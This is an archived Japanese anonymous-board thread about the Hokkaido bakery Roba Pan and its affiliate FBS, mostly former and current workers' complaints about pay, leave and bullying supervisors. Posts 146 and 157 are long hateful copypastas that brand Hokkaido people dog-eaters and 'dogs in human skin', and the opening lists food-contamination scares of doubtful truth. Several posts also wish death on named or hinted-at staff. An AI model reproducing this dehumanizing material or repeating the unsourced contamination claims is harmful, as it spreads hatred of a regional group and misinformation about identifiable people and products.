市中に2045sが出庫されたが回収されたのは4.2s(0.2%)に止まった。
去年大腸菌が検出されたアイス類も2万966sのうち4.8%である1008sだけ回収された。
これ以外にも安息香酸が検出された丸ごとの北見タマネギ、鉄粉が入った粉末十勝牛乳、寄生虫
の卵が検出されたジンギスカンなどもほとんど回収されなかったことが明らかになった。

●北海道産ショウガから基準値超える殺虫剤、販売業者が回収
北海道は13日、札幌市のスーパーで販売された
北海道産の根ショウガから、食品衛生法に基づく基準値の6倍にあたる
0.6ppmの殺虫剤が検出されたと発表した。道によると、健康への影響もありうるという。
帯広市の「鈴木道太商店」が包装した150グラム入りパックで、
9、10月に少なくとも4万パックが全国の卸売店などを通じて販売されたという。
ラベルに同社の名が書いてあり、同社が自主回収するという。

136 :名無しさん@お腹いっぱい。:2006/12/28(木) 17:17:15 ID:74mdWdir
ロバパンは何処で買えますか教えてください。

137 :名無しさん@お腹いっぱい。:2006/12/29(金) 01:28:52 ID:ALVX63nE
なんでこんなに北海道を嫌がらせするんだろうかな。

138 :シャドウ ◆yBVqSplqmM :2006/12/30(土) 03:34:27 ID:BwlvU8K0
>>136
道内のスーパーやセブンイレブンで買えますよ(^-^)

139 :シャドウ ◆yBVqSplqmM :2006/12/31(日) 10:55:18 ID:Wnl+9Gvt
正月休みって何ですか?
てか正月にパン食う?

140 :シャー:2006/12/31(日) 22:21:38 ID:UhtO4eCW
休みをくれっー

141 :名無しさん@お腹いっぱい。:2007/01/01(月) 00:47:44 ID:fQlAxlNT
札幌工場の工場長って今は誰なの?

142 :シャドウ ◆yBVqSplqmM :2007/01/01(月) 01:02:34 ID:y/luOevk
       ∩∩
      /※※)
 2007 ∧∧ /
     (゚Д゚∪
 ╋┓┏┓ ├─┤
 ┃┃┗┛ ├─┤
  ┏━┓ ├─┤
  ┣━┫ ├─┤
  ┣━┫ ├─┤
  ┗┳┫ ├─┤
  ━┳━ ├─┤
   ┃  ├─┤
  ┃┣━ ├─┤
  ┃┃  ├─┤
  ┻┻━ ├─┤
    ∧_∧-─┤
   ( ・∀・)つ┤
   / )]つ-┤
   /※大※-─┤
   (_/7_)

143 :シャドウ ◆yBVqSplqmM :2007/01/01(月) 01:46:47 ID:y/luOevk
>>140
誰だか把握したwww

144 :名無しさん@お腹いっぱい。:2007/01/01(月) 02:31:14 ID:fQlAxlNT
FBSの○ド○課長まだ居るの?死ねばいいのに
シャドウさんよFBSの内情について教えてくれよ、因みに俺が居た頃の工場長は○ガ○課長ね。

145 :シャドウ ◆yBVqSplqmM :2007/01/01(月) 15:13:41 ID:y/luOevk
>>144
ぶっちゃけFBSはよくわからん。現在の本社工場の工場長はKさんです。

146 :道民死ね:2007/01/01(月) 15:48:23 ID:quOlqyVG
●北海道での恐怖の犬料理屋の体験
北海道には犬料理屋が3、4件あるそうで、その中でも手稲山や藻岩山で捕まえて解体した
という新鮮?な犬が食べられるすすきのの「S」という店へ連れていかれました。
まずはビールを一杯。そして登場した犬料理は何かの汁で煮込まれた骨付きの犬肉。
私以外の北海道の人達はこれを美味そうな肉だなぁと今日も出汁がしっかり出ていると話していました。
煮えてきたところでこの人達は、この熊肉と牛肉を足して二で割ったような食感がたまらないと
舌打ちをしながら勢い良く食べていました。
私はそんな姿を見ておぞましいなんて野蛮な人間なんだと恐怖心が芽生えてきました。
それでも北海道人は、ほらスープすすってみなよと勧めてきます。
スープも上品な味だし、そのまま煮込み料理にできる程しっかりとしたものだと
再三に渡り食べてみるように勧めてきます。
そんなやり取りが何度か行われても私はちょっと今日は寒くて胃の調子が悪いなどと断り、
食べることはしませんでした。
そうしていると、北海道人の一人が鍋の中から棒のような塊を拾いあげてしゃぶついてました。
私はそのすくいあげた物体を注視してみました。
な、なんと肉球のついたままの犬の手か足でした。
それをむしゃむしゃとほおばっていました。
その瞬間私は、気持ちが悪くなりトイレへ駆け込みました。
北海道では肉料理は恐ろしくて食べることができません。

147 :名無しさん@お腹いっぱい。:2007/01/02(火) 01:15:12 ID:ZaiX4dOD
正月から仕事とは可哀相だなオマエらは

148 :名無しさん@お腹いっぱい。:2007/01/06(土) 16:19:44 ID:Aa6HqoUc
【毒入り危険】ロバパン【食べたら死ぬで】

149 :名無しさん@お腹いっぱい。:2007/01/10(水) 22:05:30 ID:K3Xc94O8
ロバパンって歴史が古く優良企業と聞くけど違うの?

150 :名無しさん@お腹いっぱい。:2007/01/10(水) 23:25:20 ID:KC31oVNg
遥か昔、天皇家にパンを献上したって話は聞いた事が在る
陛下を含む皇室一族が実際に食べたかどうかは分からないが。

151 :名無しさん@お腹いっぱい。:2007/01/11(木) 00:51:30 ID:pjc42j1w
>>149
ぶっちゃけ優良にはちょっとほど遠いです。トホホ。

152 :名無しさん@お腹いっぱい。:2007/01/11(木) 17:00:00 ID:Tur9qcIj
残念だった優良企業じゃなくて。

153 :シャドウ ◆yBVqSplqmM :2007/01/14(日) 00:25:11 ID:MPCyk9c/
>>149
創業からまだ75年しかたってないよ。

154 :名無しさん@お腹いっぱい。:2007/01/18(木) 22:38:29 ID:IDSw++kv
高3の18歳ですけど来年ロバパンに就職したいと考えてますけど
給料ってどの位ですか(基本給・ボーナス)?、休日は年間何日ですか(GW・盆休み・年末年始)?、有給休暇は取り易い(使い易い)ですか?

155 :名無しさん@お腹いっぱい。:2007/01/19(金) 02:13:00 ID:kQ2l1u2D
昭和6年創業の歴史ある会社です。

156 :名無しさん@お腹いっぱい。:2007/01/20(土) 21:55:51 ID:ubb3sv70
>>154
高卒なら基本給は11万前後だと思います。
+加給+精勤手当+時間外で残業を除くと総額15万前後ではないでしょうか。
団塊世代の退職金と工場の設備投資費で多額の経費を必要とする為、ボーナスは期待しない方いいですよ。
尚、部署によりますが工場勤務ならシフトによる週休2日制。
GW、お盆、年末年始は繁忙期に当たる為、休みはありません。
有給休暇は退職時以外は使えないです。
定年まで勤める覚悟があるなら別ですが、途中で転職するなら営業や総務以外はスキルがつかずお勧め出来ません。

157 :名無しさん@お腹いっぱい。:2007/01/21(日) 08:06:55 ID:e6BQZRGO
●北海道人のルーツは実は犬?
北海道人のルーツは実は犬だったのではないか?。
何故にそのように思うかそれは犬の性質と北海道人の性質をよーく比較すると、
あまりにも類似点が多いことがわかる。
@犬は主人に従順に仕えるが、家族の中では順位を付けて常に自分がどの位置にあるかを把握し、
自分より下位と考えるものに対しては命令を聞かないし馬鹿にする。
酷いときには敵対心をむき出しにする。
北海道人は相手の年齢や職業などをやたら気にする。
そして相手が自分より年下(たとえ1ヶ月でも)だと分かると態度が急に尊大になる。
従って群れの中での順位争い仲間内での競争は熾烈。
北海道人同士でもすぐに他人と比較し優劣をつけたがる。
A野良犬は1匹ではたいしたことないが、
数が集まって徒党を組むと急に凶暴になって手に負えなくなる。
常に群れを統率できる強力なリーダーが居なければ行動を自制できない。
B弱い犬はとにかくやたら吼える。
犬の喧嘩と北海道人の喧嘩は、大声でわめき散らしたほうが勝つのと同じ。
C自分より強い相手には徹底して媚を売るが、
相手が少しでも弱みを見せると猛然と反旗を翻し攻撃してくる。
しかし犬は恩を受けた飼い主には忠実だが、北海道人は恩を受けても感謝することなく、
忠誠心もなく自分の都合で平気で恩人を裏切る(犬より劣る)。
昔々大陸にまだ民族というものがなかった頃、
今の中国大陸あたりで人間が初めて野生の犬(先祖は狼)を家畜として飼い始めた頃、
その人たちが現在の北海道あたりに移ってきて、そのときにつれて来た犬たちが増殖し、
あるとき犬が神様にお願いをした。
いつまでも人間の家畜として生きるのはいやだ、どうか私たちを人間にしてくださいと。
神様はその犬たちを哀れに思い願いを聞き入れ人間に変身させたのだが、
そのとき神様は最大の過ちを犯してしまったのだ。
それは、犬の性質をほとんど残したまま姿かたちを人間にしてしまったのである。
それが今の北海道人のルーツであり、北海道人とは人間の皮をかぶった犬である。
潜在的にそれがあるから早く本当の人間になりたいという願望が犬を最大の侮辱と感じるのであろう。
北海道弁では罵詈雑言の中で犬に関係するものが圧倒的に多い。
一番ポピュラーな罵倒語がケセッキ(直訳すると子犬のようなやつ)であるが、
北海道人は犬にたとえられるのを一番嫌うようだ。
本州人はお前は犬だといわれても別段どうってことないが??
犬といわれると自分たちのルーツ、ずばり人種的本質を指摘されるので、
自然と拒絶反応がでて血が騒ぐのであろう。
犬食いの習慣を揶揄し非難する人が居るがこれは、
食文化や習慣に関するものだから他地域の他人種がとやかく言う問題ではないので、
犬食いだけを取り上げて非難してはいけない。
中国では空飛ぶものは飛行機、
四足では机以外は何でも食材にするといわれるほど食に貪欲であり、
従って世界に名だたる中華料理を生み出している。
しかし、一方では犬を大変愛する民族であることも事実だ。
それは深層心理では犬と繋がってるからだろう。
とにかく犬と非常にかかわりの深い民族であることは間違いないと思う。
北海道に滞在したり北海道を旅行したりすると感じるが、
不思議なことに猫を(野良猫)を一度も見たことがない。
札幌の大都市周辺限らず、旭川、函館、帯広、釧路、奥尻島、
そして地方の田舎町まで行ったが、
ここ5年間で一度たりとも猫に遭遇したことないのである。
北海道も愛猫家は居るはずですから全然居ないわけはないと思うが、
どなたか飼い猫ではない野良猫をみたことありますか?
話が途中でずれてしまいましたが、まあご勘弁を。
愚説として読みとばしてください。抗議は受け付けません。

158 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:06:37 ID:cqwLMaIc
北海道って本当に仕事無いんだね

パン工場ぐらいしか仕事無いの?

159 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:49:14 ID:cJ6fBxrh
頭脳パンを買ってきた。

160 :シャドウ ◆yBVqSplqmM :2007/01/29(月) 12:30:20 ID:a4P660V1
wiki
http://ja.wikipedia.org/wiki/%E3%83%AD%E3%83%90%E3%83%91%E3%83%B3

161 :名無しさん@お腹いっぱい。:2007/01/29(月) 22:43:26 ID:mZntv7gz
このwikiシャドウさんが作ったんですか?このスレに書き込まれた時期と近かったものですから・・・
違っていたらすいません。

162 :シャドウ ◆yBVqSplqmM :2007/02/01(木) 14:46:48 ID:rfIU0zIG
>>161
いや俺じゃないよ。なんとなくググったら出てきたからリンクさせといただけ。

163 :名無しさん@お腹いっぱい。:2007/02/05(月) 10:06:18 ID:G/6gKiqa
シャドーさんって物流?
仕分け(仕分け作業)やってんの?

164 :シャドウ ◆yBVqSplqmM :2007/02/05(月) 14:20:29 ID:Xl4YHgvd
>>163
物流ですが何か?
人手不足で大変困っています。

165 :名無しさん@お腹いっぱい。:2007/02/05(月) 15:08:35 ID:pVZAIEY5
潰れろ くそパン屋

166 :名無しさん@お腹いっぱい。:2007/02/06(火) 07:01:35 ID:tuOz/490
ここでバイトして精神崩壊しかけた

167 :名無しさん@お腹いっぱい。:2007/02/06(火) 12:43:23 ID:qBcL7dzv
↑何があったの?

168 :名無しさん@お腹いっぱい。:2007/02/07(水) 23:34:05 ID:GdrYlBo2
ロバも酷いがFBSは
もっと悲惨だぞ

169 :名無しさん@お腹いっぱい。:2007/02/08(木) 08:43:09 ID:MCTMI6UF
↑詳しく

170 :名無しさん@お腹いっぱい。:2007/02/08(木) 12:45:43 ID:kNBWodsd
6年前の話だけど
職安の紹介でロバ(本社工場)に行ったら初日にいきなりFBSに配属された
有給使わせてくれないんで8ヶ月で辞めた。

171 :シャドウ ◆yBVqSplqmM :2007/02/10(土) 10:56:15 ID:FcEaturc
>>170
有給使えないのはFBSだけじゃないぞ。

172 :名無しさん@お腹いっぱい。:2007/02/10(土) 22:50:15 ID:XJ21yK4i
白石のボロ工場に面接に行ったよ、派遣だけど。
FBSの人事担当のハゲが何かむかついた

173 :名無しさん@お腹いっぱい。:2007/02/12(月) 00:13:14 ID:LDtf8GB/
ここって職安の紹介や雑誌の掲載ではロバで募集してるけど実際行ってみると>>170みたいにFBSに配属って事が多い
俺ん時も同じだった、まぁすぐ辞めたけどさ
今でもこんなあざとい事やってんのかね?

174 :名無しさん@お腹いっぱい。:2007/02/12(月) 21:32:29 ID:9E6UVR+/
シャドウさんは本通の工場で働いてンの?

175 :名無しさん@お腹いっぱい。:2007/02/13(火) 05:58:44 ID:Ujh1j37j
物流は12号線に面した工場の裏側。

176 :シャドウ ◆yBVqSplqmM :2007/02/14(水) 03:01:57 ID:ICnawepR
>>175
その通り。詳しいね

177 :名無しさん@お腹いっぱい。:2007/02/14(水) 09:52:01 ID:HBNywm1q
[シャドーさんに質問]

・年齢は?
(10代?20代?30代?40代?)
・新卒or中途採用?
・入社何年目?
・ロバ入社を志した動機は?
・入社時に貰ったロバパンのマークのバッチ(背広に付けるタイプの奴)今でも持ってる?

178 :名無しさん@お腹いっぱい。:2007/02/14(水) 10:20:56 ID:hz1YC5p5
>>176
ちょwww元物流社員だしwwww
ロムってたけど参加wwww

179 :シャドウ ◆yBVqSplqmM :2007/02/14(水) 14:42:15 ID:ICnawepR
>>177
・20台後半
・バイト
・10年目
・近いから
・バイトだからもらってない

>>178
ちょwwwwwwマジで?wwwwww気になるwwwwww


180 :名無しさん@お腹いっぱい。:2007/02/14(水) 17:42:49 ID:hz1YC5p5
>>179
低 能 な 班 長 補 連 中
に嫌気さして辞めただけだからwwww
パートやアルバイトさんはガンガッてるのに...
出る杭は打ってばかりで
育てようとしないから勿体無い

181 :シャドウ ◆yBVqSplqmM :2007/02/14(水) 18:12:10 ID:ICnawepR
>>180
何となく誰だか分かった。
俺の事も知ってるはずwww

182 :名無しさん@お腹いっぱい。:2007/02/14(水) 18:32:47 ID:hz1YC5p5
>>181
知ってるよwwww
シャドウくん元気でやってるかい?
相変わらず忙しそうだけど
カラダ壊さないように(`・ω・´)ガンガレ
●ヽ( ・∀・)ノ●ウンコーとか元気かいwwww?

183 :名無しさん@お腹いっぱい。:2007/02/14(水) 22:46:30 ID:HBNywm1q
シャドーさんバイトで10年もやってれば正社員登用のオファーも在るだろうに

(´・ω・)やっぱ正社員にはなりたく無いの?

184 :名無しさん@お腹いっぱい。:2007/02/16(金) 02:55:46 ID:FLakAHNR
182さんは今何やってるの?

185 :シャドウ ◆yBVqSplqmM :2007/02/16(金) 21:14:12 ID:UiL49GtI
>>182
まぁそれなりにwww
あいかわらず人がいなく忙しいですがみんな元気ですよ。

>>183
辞令がおりませんでした。

186 :石上:2007/02/17(土) 00:32:30 ID:tMHd8oc6
すまん
全部俺が悪い

187 :名無しさん@お腹いっぱい。:2007/02/17(土) 11:42:29 ID:J3vf0o4m
ロバで使えない奴はFBSへ飛ばされる

188 :名無しさん@お腹いっぱい。:2007/02/18(日) 22:52:51 ID:pDimk4Oc
違う
余程使える奴と余程使えない奴の集まり

189 :名無しさん@お腹いっぱい。:2007/02/19(月) 16:39:05 ID:FNkVsKse
ロバスレがあったとはw

昔、本社包装に居たんだけど今の時期は寒いよね。
物流は特にキビシイだろうけど、シャドウさんガンガレw

190 :名無しさん@お腹いっぱい。:2007/02/20(火) 23:06:44 ID:rLvkZzru
たかがバイトのシャドウ

191 :名無しさん@お腹いっぱい。:2007/02/21(水) 03:02:16 ID:t37AGnPF
ガンガレシャドウさん!!!!!!!

192 :シャドウ ◆yBVqSplqmM :2007/02/22(木) 01:41:50 ID:M2Myz5D0
ありがとう!!!
ガンガル!!!

193 :名無しさん@お腹いっぱい。:2007/02/22(木) 22:38:22 ID:ywxYw7SS

(´∀`)死ねカス
たかがパン屋だろw

194 :名無しさん@お腹いっぱい。:2007/02/25(日) 14:10:59 ID:u1OB1FR2
↑うっせ、お前こそ死ね

シャドウに幸あれ。

195 :名無しさん@お腹いっぱい。:2007/02/26(月) 01:20:56 ID:XjLuhqlh
↑いいこと言った

196 :シャドウ ◆shadowDD.o :2007/02/26(月) 22:05:15 ID:wmi8Xcs5
>>194>>195
ありがとう
元気出た(´∀`)

197 :名無しさん@お腹いっぱい。:2007/02/27(火) 03:24:50 ID:OoGZ55q+
このスレ立てたのシャドウさん?

198 :シャドウ ◆shadowDD.o :2007/02/27(火) 18:31:03 ID:6FhoTE9k
>>197
違いますよ。>>87が初カキコです(・ヮ・)

199 :名無しさん@お腹いっぱい。:2007/03/01(木) 10:42:32 ID:GY9H3Mnn
白石の工場の洗濯場の白髪頭のムカつくババァってまだ居るの?

200 :名無しさん@お腹いっぱい。:2007/03/01(木) 12:14:24 ID:GQZJNhEL
俺はFBSの○田のせいで鬱になった……。やめたら治ったけどな(・∀・)

201 :名無しさん@お腹いっぱい。:2007/03/01(木) 20:27:31 ID:GY9H3Mnn
↑どこの工場?
恵庭?札幌?函館?白老?旭川?十勝?

202 :名無しさん@お腹いっぱい。:2007/03/02(金) 00:16:20 ID:ZRB5HaKM
白石(・∀・)あそこはまじ最悪(´Д`)

203 :名無しさん@お腹いっぱい。:2007/03/02(金) 02:12:59 ID:tUsNXjmG
↑いいや
十勝はもっと悲惨だぞ
(´・ω・`)
ところで白老の工場長って○木サン?
○永班長(江頭2:50似)は元気かね?

204 :名無しさん@お腹いっぱい。:2007/03/02(金) 02:52:50 ID:ZRB5HaKM
いやいや白石のが悲惨だぞ(´ζ`)舌打ちされるからな。 村○うぜぇ、嫌われもんだべあいつなんとかしなきゃ人なんてみんなやめてく(´・ω・`)

205 :名無しさん@お腹いっぱい。:2007/03/03(土) 02:40:49 ID:f6419SKJ
今日は雛祭りなんで
ふと思い出したのだが(かなり昔の話)俺が白石の工場でバイトしてた時、雛祭り・子供の日になると桜餅・おはぎ・柏餅が従業員に配られて結構嬉しかったのだが今でもやってんのかなぁ?
只、クリスマス時期にケーキを強制的に買わされるのは嫌だったけど(笑)

206 :名無しさん@お腹いっぱい。:2007/03/04(日) 16:05:38 ID:Th5fluzG
素手で触りまくってるパンなんか食いたくねーな(´ζ`)といいつつハムチーズは好物だったんだ俺…

207 :名無しさん@お腹いっぱい。:2007/03/04(日) 20:33:34 ID:Aj3VIoFA
↑初期のハムチーズかい?ハムとマヨネーズのトッピングあれは最高だったよね
個人的には、ちくわパンも好きだったのだが(笑)

208 :名無しさん@お腹いっぱい。:2007/03/04(日) 20:38:32 ID:Aj3VIoFA
>>204>>206
ひょっとしたら君の事知ってるかもしれない
1993〜1998年迄の間にFBSに在籍してなかったかい?

209 :名無しさん@お腹いっぱい。:2007/03/04(日) 21:16:21 ID:Th5fluzG
俺は去年やめたんだ(゜∀゜)
208はFBSなのかい?相変わらずいじめはあるのか?

210 :名無しさん@お腹いっぱい。:2007/03/04(日) 22:22:01 ID:Aj3VIoFA
↑俺が白石のFBSに居たのは1993〜1998年迄の5年間だから人違いだったね
その当時の班長はまだ在籍してるかな?
{○○ハ○班長(カツMix)・サ○○班長(チビ眼鏡)・○オ○○班長(小松じゃなくて)}

211 :名無しさん@お腹いっぱい。:2007/03/05(月) 05:42:10 ID:3AO2tZip
>>シャドウさんって工事?


>>182は誰だろ?
低脳な班長補は、SとかI辺りだろうけど…。
辞めてしまった人か、たくさんいすぎだ。

212 :名無しさん@お腹いっぱい。:2007/03/05(月) 08:30:15 ID:MO3VyLVc
お〇〇つとた〇は〇は俺んときはいたぜ(・∀・)
班長より俺は社員が気に食わないな(゜∀゜)

213 :名無しさん@お腹いっぱい。:2007/03/06(火) 20:21:58 ID:G+gBs56f
シャドウ君。上の人間に目付けられてるから書き込み止めた方がいいぞ
俺は忠告したからな 聞かないでどうなっても知らないぞ

214 :名無しさん@お腹いっぱい。:2007/03/06(火) 22:08:50 ID:g9ngWA2T
何方か現役のFBS関係者って居ませんか?
FBS札幌工場の○オ○ツ班長・○サ○班長・○カ○シ班長って係長になったんですかね?
後、FBS十勝工場の○ラ○工場長兼係長・○ヤ○カ班長の2人はどうなってるんですか?

215 :名無しさん@お腹いっぱい。:2007/03/06(火) 22:55:55 ID:MCGkthtq
王様の耳はロバのパン

216 :名無しさん@お腹いっぱい。:2007/03/07(水) 11:46:49 ID:on4CEWKX
上の奴らが見てるなら社員の指導しろよ(¨;)誰もバイトなんか来なくなるぞ(〒Д〒)こちとら社員の機嫌次第で扱いが違うからいい迷惑だぜ(´;ω;`)

217 :名無しさん@お腹いっぱい。:2007/03/07(水) 11:47:56 ID:on4CEWKX
ま、俺はもう関係ないが言ってみた(笑)

218 :名無しさん@お腹いっぱい。:2007/03/07(水) 13:42:54 ID:SNglJJ8x
↑そう言うアナタは
ロバ?FBS?

219 :名無しさん@お腹いっぱい。:2007/03/07(水) 15:44:23 ID:on4CEWKX
FBSにいた(゚д゚)>>>
そーゆーあなたは↑?

220 :名無しさん@お腹いっぱい。:2007/03/09(金) 21:27:40 ID:7Yhx5xvj
( ・ω・)ノ――――@" クルクル
( ・ω・)ノ――――――――――@)>>213`Д)、;'.・ ガッ
( ・ω・)ノ@ パシッ


221 :名無しさん@お腹いっぱい。:2007/03/09(金) 22:54:40 ID:iKx+J5ui
↑何の因果がマッポの手先

222 :名無しさん@お腹いっぱい。:2007/03/12(月) 06:55:14 ID:j8+SoeoS
シャドウさん
Kって女は元気ですか?




223 :名無しさん@お腹いっぱい。:2007/03/12(月) 13:39:16 ID:dfoXT99w
( ・ω・)ノ――――@" クルクル
( ・ω・)ノ――――――――――@)>>222`Д)、;'.・ ガッ
( ・ω・)ノ@ パシッ

物流の社員か班長補?
物流は人間関係最悪だわ
班長補連中を筆頭に性格悪すぎる


224 :名無しさん@お腹いっぱい。:2007/03/13(火) 20:31:11 ID:6ha4zE0t
↑何の因果かマッポの手先

225 :名無しさん@お腹いっぱい。:2007/03/14(水) 11:03:57 ID:Rhbr8Yg1
FBSってロバグループ内でも、かなり異端児的な存在だよね

226 :名無しさん@お腹いっぱい。:2007/03/14(水) 21:51:55 ID:4v1+rDRD
>>225
FBSが無ければとっくにロバ潰れてるけどな

227 :名無しさん@お腹いっぱい。:2007/03/17(土) 19:01:02 ID:gIpeByFm
ロバパンが北海道から消えたの?

228 :名無しさん@お腹いっぱい。:2007/03/17(土) 20:33:48 ID:KDESbX06
消えた訳では無くフジパンの傘下になっただけ
本来はフジパンに吸収合併されロバパンの名も消えるはずだったのだが北海道ではフジパンの名が浸透してないためロバの名を残したんだよ。

229 :名無しさん@お腹いっぱい。:2007/03/17(土) 21:13:31 ID:L9nJ5Z7C
へぇ〜よく知ってるね!!関係者?

230 :名無しさん@お腹いっぱい。:2007/03/18(日) 00:41:04 ID:LuEfXAgx
現役バリバリの関係者!!!!何でも答えますよ!!!

231 :名無しさん@お腹いっぱい。:2007/03/18(日) 03:18:54 ID:MeFNNez3
↑じゃあFBS誕生の経緯を説明せよ

232 :名無しさん@お腹いっぱい。:2007/03/18(日) 16:54:23 ID:8XhFll3/
>>230
恵庭に食パンラインの
工場を建てた経緯を説明せよ。

233 :名無しさん@お腹いっぱい。:2007/03/18(日) 21:43:34 ID:MeFNNez3
↑「本仕込み」ブランドに本腰入れる為?

234 :名無しさん@お腹いっぱい。:2007/03/18(日) 23:11:26 ID:Z7qcvMkH
>>230
所属先は?

235 :名無しさん@お腹いっぱい。:2007/03/19(月) 00:07:03 ID:xrlawWA+
>>231
いい気分だったから
>>232
税金対策
>>234
社長

236 :名無しさん@お腹いっぱい。:2007/03/19(月) 00:55:30 ID:MXpBg3vU
>>235
嘘つきがでたらめ言ってんじゃねーよ

237 :名無しさん@お腹いっぱい。:2007/03/20(火) 10:53:19 ID:uMVGXf3C
今って本社に食パンラインないの?

238 :名無しさん@お腹いっぱい。:2007/03/20(火) 14:47:22 ID:U/PG8UWN
>>237
あるよ(´∀`)

239 :名無しさん@お腹いっぱい。:2007/03/20(火) 20:52:03 ID:uMVGXf3C
>>238
d、食パンってそんなに売れてるのかなあ。
ミッフィーちゃんのシールのおかげ?w

240 :名無しさん@お腹いっぱい。:2007/03/22(木) 09:33:40 ID:DE03IFyZ
確かに
本仕込みになってからは売れてる

241 :名無しさん@お腹いっぱい。:2007/03/23(金) 05:55:11 ID:zx34ae84
>>223
まともなのはいないのか?
班長からしてはちゃめちゃだからなー

242 :(V)o\o(V):2007/03/23(金) 16:45:45 ID:eN4Et5y8
白石のロバパン、具体的にどうキツイか教えて??
どんな感じ?(V)o\o(V)

243 :名無しさん@お腹いっぱい。:2007/03/23(金) 18:20:50 ID:iEkT26gZ
>>242
[使えそうな奴の場合]→手っ取り早く一人前にしようと、あれこれ仕事を詰め込み過ぎるモンだから潰れてく奴が多い

[使えなさそうな奴の場合]→潰される(皆で吊し上げ)

54 KB
■ このスレッドは過去ログ倉庫に格納されています

>>68    名前:ラビットソン ◆MppH6zZFxM      そのスレは、無限のAAで出来ていた
───────────────────────────────────
>>71    名前: ◆writeO1QeE                通り
>>73-74  .名前:(`д´ゞ)カツオ ◆katuo6pun6     L A S T E X I L E
>>76    名前:壊死 ◆qDqCzX.7cg             擬人化ハトよめのアッーウッウッイネイネ AA動画
>>87    名前: ◆3zNBOPkseQ              ポケサンカンパニー
>>90    名前: ◆No11.rh.Hg              めがねくん
───────────────────────────────────
t="_blank">>>41,>>42は同一トリップなので、1人1作品の原則から2枚で【数コマ部門】としました。
/test/read.cgi/bread/1139408949/">★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)